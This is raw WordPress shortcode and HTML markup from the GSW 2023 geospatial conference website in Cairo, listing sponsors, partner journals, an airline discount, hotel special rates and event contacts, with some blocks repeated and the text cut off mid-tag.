border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" 